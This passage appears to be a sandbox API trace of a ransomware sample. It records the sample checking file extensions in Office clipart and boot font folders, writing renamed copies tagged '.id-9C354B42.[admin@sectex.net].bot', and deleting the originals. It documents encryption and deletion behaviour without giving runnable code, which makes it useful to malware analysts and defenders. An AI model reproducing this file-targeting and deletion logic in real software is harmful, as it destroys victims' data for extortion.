	[0059.254] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0059.254] lstrlenW (lpString=".7z") returned 3
	[0059.254] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0059.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 63
	[0059.254] lstrlenW (lpString=".dbf") returned 4
	[0059.254] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0059.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 63
	[0059.254] lstrlenW (lpString=".1cd") returned 4
	[0059.254] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0059.254] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 63
	[0059.254] lstrlenW (lpString=".jpg") returned 4
	[0059.254] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0059.255] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 63
	[0059.255] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 63
	[0059.255] lstrlenW (lpString=".doc") returned 4
	[0059.255] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0059.255] lstrlenW (lpString=".docx") returned 5
	[0059.255] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0059.255] lstrlenW (lpString=".pdf") returned 4
	[0059.255] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0059.255] lstrlenW (lpString=".xls") returned 4
	[0059.255] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0059.255] lstrlenW (lpString=".xlsx") returned 5
	[0059.255] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0059.255] lstrlenW (lpString=".ppt") returned 4
	[0059.255] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0059.255] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 63
	[0059.255] lstrlenW (lpString=".zip") returned 4
	[0059.255] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0059.255] lstrlenW (lpString=".rar") returned 4
	[0059.255] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0059.255] lstrlenW (lpString=".bz2") returned 4
	[0059.255] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0059.255] lstrlenW (lpString=".7z") returned 3
	[0059.255] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0059.257] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 63
	[0059.257] lstrlenW (lpString=".dbf") returned 4
	[0059.257] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0059.257] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 63
	[0059.257] lstrlenW (lpString=".1cd") returned 4
	[0059.257] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0059.257] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 63
	[0059.258] lstrlenW (lpString=".jpg") returned 4
	[0059.258] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0059.258] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0059.258] lstrlenW (lpString="AN04196_.WMF") returned 12
	[0059.258] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04196_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0059.258] GetFileSizeEx (in: hFile=0x188, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=3144) returned 1
	[0059.258] CloseHandle (hObject=0x188) returned 1
	[0059.258] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04196_.wmf")) returned 0x20
	[0059.258] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04196_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0059.258] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04196_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0059.258] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0059.258] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0059.259] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04196_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158
	[0059.259] GetLastError () returned 0x0
	[0059.259] ReadFile (in: hFile=0x188, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0xc48, lpOverlapped=0x0) returned 1
	[0059.260] WriteFile (in: hFile=0x158, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xc50, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xc50, lpOverlapped=0x0) returned 1
	[0059.261] ReadFile (in: hFile=0x188, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0059.261] WriteFile (in: hFile=0x158, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0059.261] SetEndOfFile (hFile=0x158) returned 1
	[0059.261] CloseHandle (hObject=0x158) returned 1
	[0059.261] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0059.262] SetEndOfFile (hFile=0x188) returned 1
	[0059.262] CloseHandle (hObject=0x188) returned 1
	[0059.262] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0059.262] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04196_.wmf")) returned 1
	[0059.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 63
	[0059.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 63
	[0059.263] lstrlenW (lpString=".doc") returned 4
	[0059.263] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0059.263] lstrlenW (lpString=".docx") returned 5
	[0059.263] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0059.263] lstrlenW (lpString=".pdf") returned 4
	[0059.263] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0059.263] lstrlenW (lpString=".xls") returned 4
	[0059.263] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0059.263] lstrlenW (lpString=".xlsx") returned 5
	[0059.263] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0059.263] lstrlenW (lpString=".ppt") returned 4
	[0059.263] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0059.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 63
	[0059.263] lstrlenW (lpString=".zip") returned 4
	[0059.263] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0059.263] lstrlenW (lpString=".rar") returned 4
	[0059.263] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0059.263] lstrlenW (lpString=".bz2") returned 4
	[0059.263] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0059.263] lstrlenW (lpString=".7z") returned 3
	[0059.263] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0059.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 63
	[0059.263] lstrlenW (lpString=".dbf") returned 4
	[0059.263] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0059.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 63
	[0059.263] lstrlenW (lpString=".1cd") returned 4
	[0059.263] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0059.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 63
	[0059.263] lstrlenW (lpString=".jpg") returned 4
	[0059.264] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0059.264] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 63
	[0059.264] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 63
	[0059.264] lstrlenW (lpString=".doc") returned 4
	[0059.264] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0059.264] lstrlenW (lpString=".docx") returned 5
	[0059.264] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0059.264] lstrlenW (lpString=".pdf") returned 4
	[0059.264] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0059.264] lstrlenW (lpString=".xls") returned 4
	[0059.264] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0059.264] lstrlenW (lpString=".xlsx") returned 5
	[0059.264] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0059.264] lstrlenW (lpString=".ppt") returned 4
	[0059.264] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0059.264] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 63
	[0059.264] lstrlenW (lpString=".zip") returned 4
	[0059.264] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0059.264] lstrlenW (lpString=".rar") returned 4
	[0059.264] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0059.264] lstrlenW (lpString=".bz2") returned 4
	[0059.264] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0059.264] lstrlenW (lpString=".7z") returned 3
	[0059.264] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0059.264] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 63
	[0059.264] lstrlenW (lpString=".dbf") returned 4
	[0059.264] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0059.264] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 63
	[0059.264] lstrlenW (lpString=".1cd") returned 4
	[0059.264] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0059.264] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 63
	[0059.264] lstrlenW (lpString=".jpg") returned 4
	[0059.264] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0059.265] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0059.265] lstrlenW (lpString="AN04206_.WMF") returned 12
	[0059.265] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04206_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0059.265] GetFileSizeEx (in: hFile=0x188, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=7668) returned 1
	[0059.266] CloseHandle (hObject=0x188) returned 1
	[0059.266] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04206_.wmf")) returned 0x20
	[0059.266] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04206_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0059.266] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04206_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0059.266] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0059.266] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0059.266] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04206_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158
	[0059.272] GetLastError () returned 0x0
	[0059.272] ReadFile (in: hFile=0x188, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x1df4, lpOverlapped=0x0) returned 1
	[0059.274] WriteFile (in: hFile=0x158, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0x1e00, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0x1e00, lpOverlapped=0x0) returned 1
	[0059.275] ReadFile (in: hFile=0x188, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0059.275] WriteFile (in: hFile=0x158, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0059.275] SetEndOfFile (hFile=0x158) returned 1
	[0059.275] CloseHandle (hObject=0x158) returned 1
	[0059.275] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0059.275] SetEndOfFile (hFile=0x188) returned 1
	[0059.276] CloseHandle (hObject=0x188) returned 1
	[0059.276] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0059.276] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04206_.wmf")) returned 1
	[0059.276] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 63
	[0059.276] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 63
	[0059.276] lstrlenW (lpString=".doc") returned 4
	[0059.276] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0059.276] lstrlenW (lpString=".docx") returned 5
	[0059.277] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0059.277] lstrlenW (lpString=".pdf") returned 4
	[0059.277] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0059.277] lstrlenW (lpString=".xls") returned 4
	[0059.277] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0059.277] lstrlenW (lpString=".xlsx") returned 5
	[0059.277] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0059.277] lstrlenW (lpString=".ppt") returned 4
	[0059.277] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0059.277] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 63
	[0059.277] lstrlenW (lpString=".zip") returned 4
	[0059.277] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0059.277] lstrlenW (lpString=".rar") returned 4
	[0059.277] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0059.277] lstrlenW (lpString=".bz2") returned 4
	[0059.277] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0059.277] lstrlenW (lpString=".7z") returned 3
	[0059.277] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0059.277] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 63
	[0059.277] lstrlenW (lpString=".dbf") returned 4
	[0059.277] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0059.277] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 63
	[0059.277] lstrlenW (lpString=".1cd") returned 4
	[0059.277] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0059.277] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 63
	[0059.277] lstrlenW (lpString=".jpg") returned 4
	[0059.277] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0059.277] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 63
	[0059.277] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 63
	[0059.277] lstrlenW (lpString=".doc") returned 4
	[0059.277] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0059.277] lstrlenW (lpString=".docx") returned 5
	[0059.277] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0059.277] lstrlenW (lpString=".pdf") returned 4
	[0059.278] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0059.278] lstrlenW (lpString=".xls") returned 4
	[0059.278] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0059.278] lstrlenW (lpString=".xlsx") returned 5
	[0059.278] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0059.278] lstrlenW (lpString=".ppt") returned 4
	[0059.278] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0059.278] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 63
	[0059.278] lstrlenW (lpString=".zip") returned 4
	[0059.278] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0059.278] lstrlenW (lpString=".rar") returned 4
	[0059.278] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0059.278] lstrlenW (lpString=".bz2") returned 4
	[0059.278] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0059.278] lstrlenW (lpString=".7z") returned 3
	[0059.278] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0059.278] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 63
	[0059.278] lstrlenW (lpString=".dbf") returned 4
	[0059.278] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0059.278] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 63
	[0059.278] lstrlenW (lpString=".1cd") returned 4
	[0059.278] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0059.278] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 63
	[0059.278] lstrlenW (lpString=".jpg") returned 4
	[0059.278] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0059.278] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0059.278] lstrlenW (lpString="AN04225_.WMF") returned 12
	[0059.278] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04225_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0059.279] GetFileSizeEx (in: hFile=0x188, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=8492) returned 1
	[0059.279] CloseHandle (hObject=0x188) returned 1
	[0059.279] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04225_.wmf")) returned 0x20
	[0059.279] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04225_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0059.279] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04225_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0059.279] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0059.279] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0059.279] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04225_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158
	[0059.279] GetLastError () returned 0x0
	[0059.279] ReadFile (in: hFile=0x188, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x212c, lpOverlapped=0x0) returned 1
	[0059.587] WriteFile (in: hFile=0x158, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0x2130, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0x2130, lpOverlapped=0x0) returned 1
	[0059.588] ReadFile (in: hFile=0x188, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0059.588] WriteFile (in: hFile=0x158, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0059.588] SetEndOfFile (hFile=0x158) 

Thread:
	id = 17
	os_tid = 0x998

	[0032.823] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10000) returned 0xac308c8
	[0032.823] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10000) returned 0xac408d0
	[0032.824] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7e08fb8
	[0032.824] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x6) returned 0xabb02e0
	[0032.824] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7e08fd0
	[0032.824] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x100000) returned 0xb2d0020
	[0032.824] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7e08fe8
	[0032.824] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e08fe8, Size=0x20) returned 0x7df2f90
	[0032.824] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7e08fe8
	[0032.824] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e08fe8, Size=0x20) returned 0x7df2f68
	[0032.824] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000
	[0032.824] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650
	[0032.824] Wow64DisableWow64FsRedirection (in: OldValue=0xa7dff58 | out: OldValue=0xa7dff58*=0x0) returned 1
	[0032.824] lstrlenW (lpString="kernel32.dll") returned 12
	[0032.825] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df2f90 | out: hHeap=0x7d60000) returned 1
	[0032.825] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30
	[0032.825] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df2f68 | out: hHeap=0x7d60000) returned 1
	[0032.825] Sleep (dwMilliseconds=0x64) 
	[0033.039] lstrcmpiW (lpString1=".ttf", lpString2=".bot") returned 1
	[0033.039] lstrlenW (lpString="kor_boot.ttf") returned 12
	[0033.039] CreateFileW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0033.359] GetFileSizeEx (in: hFile=0x188, lpFileSize=0xa7dff1c | out: lpFileSize=0xa7dff1c*=2371360) returned 1
	[0033.359] CloseHandle (hObject=0x188) returned 1
